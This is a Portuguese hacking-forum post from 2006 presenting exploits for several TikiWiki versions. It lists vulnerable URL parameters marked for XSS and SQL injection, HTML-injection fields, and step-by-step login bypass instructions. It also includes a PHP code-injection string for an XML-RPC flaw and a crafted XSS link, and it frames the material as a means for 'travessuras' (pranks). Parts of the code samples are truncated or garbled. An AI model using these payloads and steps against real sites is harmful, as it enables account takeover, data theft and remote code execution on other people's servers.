Falhas e Exploits: TIkiWiki

Started by Anonymous, 06 de March , 2006, 10:54:17 PM

Previous topic - Next topic

0 Members and 2 Guests are viewing this topic.

Anonymous

Fiquei um tempo sem postar falhas e exploits, mas agora arrumei um tempinho entre estudos de C e estar sem net pra postar falhas e exploits sobre TIkiWiki, são muito innterresante essas falhas, e eu expliquei tudo certinho as informações que eu obtive e eu estudei sobre as falhas, intão está quentinho vindo do forno.. hehe.. Aconcelho que leia sobre elas, por que é muito interresante MESMO!! Dá pra fazer altas travessuras.. hehe


hotTikiWiki Project Multiple Input Validation

Essa falha pode deixar um 'hacker' realizar vários tipos de ataques, como o descobrimento de arquivos, cross-scripting, html injection, sql injection e upload de arquivos remotos.. Bem interessante não acha? Essa falha é remota e afeta:
TikiWiki Project TikiWiki 1.8.1
TikiWiki Project TikiWiki 1.8


Exploit ---

tiki-searchindex.php?highlight=[JNK]
messu-read.php?offset=[INT]&flag=&priority=&flagval=&sort_mode=
messu-read.php?offset=[INT]&flag=&priority=&flagval=
messu-read.php?offset=[INT]&flag=&priority=
messu-read.php?offset=[INT]&flag=
messu-read.php?offset=
tiki-list_file_gallery.php?find=&galleryId=1&offset=[INT]&sort_mode=
tiki-usermenu.php?find=&offset=
tiki-usermenu.php?find=&offset=[INT]&sort_mode=
tiki-browse_categories.php?find=&deep=off&parentId=[VID]&offset=[INT]&sort_mode=
tiki-browse_categories.php?find=&deep=off&parentId=[VID]&offset=
tiki-index.php?page=[VPG]&comments_threshold=[INT]&comments_offset=[INT]&comments_maxComments=
tiki-user_tasks.php?task_useDates=&taskId=[VID]&offset=[INT]&sort_mode=priority_desc&find=[JNK]
tiki-user_tasks.php?task_useDates=&taskId=[VID]&offset=[INT]&sort_mode=
tiki-directory_ranking.php?sort_mode=
tiki-file_galleries.php?find=&search=find&sort_mode=
tiki-list_faqs.php?find=&offset=[INT]&sort_mode=
tiki-list_faqs.php?find=&offset=
tiki-list_trackers.php?find=&offset=[INT]&sort_mode=
tiki-list_trackers.php?find=&offset=

Cross-site scripting:
tiki-switch_theme.php?theme=[XSS]
messu-mailbox.php?flags=&priority=&find=[XSS]
messu-mailbox.php?flags=&priority=[XSS]
messu-read.php?offset=[INT]&flag=&priority=&flagval=&sort_mode=date_desc&find=[XSS]
messu-read.php?offset=[INT]&flag=&priority=&flagval=&sort_mode=[XSS]
messu-read.php?offset=[INT]&flag=&priority=&flagval=[XSS]
messu-read.php?offset=[INT]&flag=&priority=[XSS]
messu-read.php?offset=[INT]&flag=[XSS]
messu-read.php?offset=[XSS]
tiki-read_article.php?articleId=[VID][XSS]
tiki-browse_categories.php?find=&deep=off&parentId=[VID][XSS]
tiki-index.php?page=[VPG]&comments_threshold=[INT][XSS]
tiki-print_article.php?articleId=[VID][XSS]
tiki-list_file_gallery.php?galleryId=[VID][XSS]
tiki-upload_file.php?galleryId=[VID][XSS]
tiki-view_faq.php?faqId=[VID][XSS]
tiki-view_chart.php?chartId=[VID][XSS]
tiki-survey_stats_survey.php?surveyId=[VID][XSS]

SQL injection:
tiki-usermenu.php?find=&offset=[INT]&sort_mode=[SQL]
tiki-list_file_gallery.php?find=&galleryId=[VID]&offset=[INT]&sort_mode=[SQL]
tiki-directory_ranking.php?sort_mode=[SQL]
tiki-browse_categories.php?find=&deep=off&parentId=[VID]&offset=[INT]&sort_mode=[SQL]
tiki-index.php?page=[VPG]&comments_threshold=[INT]&comments_offset=[INT]&comments_sort_mode=[SQL]
tiki-user_tasks.php?task_useDates=&taskId=[VID]&offset=[INT]&sort_mode=[SQL]
tiki-directory_ranking.php?sort_mode=[SQL]
tiki-directory_search.php?how=or&words=&where=all&sort_mode=[SQL]
tiki-file_galleries.php?find=&search=find&sort_mode=[SQL]
tiki-list_faqs.php?find=&offset=[INT]&sort_mode=[SQL]
tiki-list_trackers.php?find=&offset=[INT]&sort_mode=[SQL]
tiki-list_blogs.php?find=&offset=[INT]&sort_mode=[SQL]
tiki-usermenu.php?find=&offset=[SQL]
tiki-browse_categories.php?find=&deep=off&parentId=[VID]&offset=[SQL]
tiki-index.php?page=[VPG]&comments_threshold=[INT]&comments_offset=[SQL]
tiki-user_tasks.php?task_useDates=&taskId=[VID]&offset=[SQL]
tiki-list_faqs.php?find=&offset=[SQL]
tiki-list_trackers.php?find=&offset=[SQL]
tiki-list_blogs.php?find=&offset=[SQL]

HTML injection:
User Profile > Theme
User Profile > Country Field
User Profile > Real Name
User Profile > Displayed time zone
Directory > Add Site > Name
Directory > Add Site > Description
Directory > Add Site > URL
Directory > Add Site > Country

Remote file upload:
http://www.site_lostmind.com/img/wiki_u ... ou_te_hack



TikiWiki Authentication Bypass

A autenticação do Tikiwiki pode ser ultrapassada por hackers.
Quando colocamos um usuário correto, uma senha arbitraria, ou nula, e clicando no botão 'remember me' a aplicação não verifica as condenadas do login, e os logs para esse usuário. *ridículo não? Essa falha é remota e afeta
TikiWiki Project TikiWiki 1.6.1

Exploit --- Usando o IE digite um usuario que já existe (ou seja, valido) sem nenhuma senha, ou qualquer coisa (como por exemplo 'asdiasdji' no campo de senha). Clique em 'remember me'. Vai aparecer uma menssagem de erro. Agora você já ta logado com controle da conta da vitima.


XML-RPC for PHP Remote Code Injection
Um 'hacker' pode usar exploit para essa falha para executar codigos arbitrários ou codigos no contexto do web server. Isso pode facilitar varios ataques incluindo accesso não autorizado.

Exploit ---

Veja o seguinte conceito de arquivo XML



test.method


','')); phpinfo(); exit;/*




http://downloads.securityfocus.com/vuln ... rpc_poc.pl
http://downloads.securityfocus.com/vuln ... s/xoops.pl
http://downloads.securityfocus.com/vuln ... rpc_exp.pl
http://downloads.securityfocus.com/vuln ... pc_eval.pm


TikiWiki Tiki-view_forum_thread.PHP Cross-Site Scripting
Essa falha ocorre devido ao erro na aplicação para sintonizar um input de user.
Um 'hacker' pode executar um script arbitrário do browser para afetar o site. Isso pode facilitar acesso em base de cookie... Essa falha é remota e afeta
TikiWiki Project TikiWiki 1.9.2
TikiWiki Project TikiWiki 1.9.1 .1
TikiWiki Project TikiWiki 1.9.1
TikiWiki Project TikiWiki 1.9 -rc3.1
TikiWiki Project TikiWiki 1.9 -rc3
TikiWiki Project TikiWiki 1.9 -rc2
TikiWiki Project TikiWiki 1.9 -rc1

Exploit ---

http://www.vou_ti_hackeiar_lostmind.com ... ment.title)%3B'%3E[LALALA%20d34d%20YOUR%20d3v1l%20lalaa%20lostmind]%20%3Cx%20y=%22


TikiWiki Unauthorized File Upload
Tikiwiki é venerável a uma falha que pode autorizar a users remotos a fazerem upload de arquivos com extensão de arquivos arbitrários para o computador hospedando o software

Essa falha pode deixar que um hacker faça upload de um script malicioso de PHP no servidor, e fazer com que esse script seja executado. E foi relatado que o 'hacker' deve ter privilégios para poder fazer upload de imagens para exploitar (existe isso? Exploitar?) essa falha..
Falha remota que afeta:

TikiWiki Project TikiWiki 1.9 -rc3
TikiWiki Project TikiWiki 1.9 -rc2
TikiWiki Project TikiWiki 1.9 -rc1
TikiWiki Project TikiWiki 1.8.4
TikiWiki Project TikiWiki 1.8.3
TikiWiki Project TikiWiki 1.8.2
TikiWiki Project TikiWiki 1.8.1
TikiWiki Project TikiWiki 1.8
TikiWiki Project TikiWiki 1.7.8
TikiWiki Project TikiWiki 1.7.7
TikiWiki Project TikiWiki 1.7.6
TikiWiki Project TikiWiki 1.7.5
TikiWiki Project TikiWiki 1.7.4
TikiWiki Project TikiWiki 1.7.3
TikiWiki Project TikiWiki 1.7.2
TikiWiki Project TikiWiki 1.7.1 .1

É isso, espero que tenham gostado e que postem comentarios e opiniões a respeito..

Lostmind Group
Fonte: www.lostmind.com.br/lmc

abraços
d34d